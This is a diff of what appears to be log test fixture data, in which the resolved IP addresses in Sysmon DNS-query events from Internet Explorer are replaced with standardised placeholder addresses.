cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6116,7 +6116,7 @@ "ProcessId": "2736", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;" + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "user": { "identifier": "S-1-5-18" @@ -6140,7 +6140,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -6151,7 +6151,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6183,7 +6183,7 @@ "ProcessId": "2736", "QueryName": "cdn.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;" + "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;" } } }, @@ -6196,7 +6196,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -6215,7 +6215,7 @@ "ProcessId": "2736", "QueryName": "cdn3.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;", + "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.357" }, @@ -6250,7 +6250,7 @@ "ProcessId": "2736", "QueryName": "rtb0.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.721", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -6273,7 +6273,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -6284,7 +6284,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6303,7 +6303,7 @@ "event_data": { "QueryName": "dev.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;", + "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.774", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6326,7 +6326,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -6352,7 +6352,7 @@ "ProcessId": "2736", "QueryName": "t.ssl.ak.dynamic.tiles.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;" + "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "pid": 2828, @@ -6365,7 +6365,7 @@ { "@timestamp": "2021-05-05T15:30:51.709Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 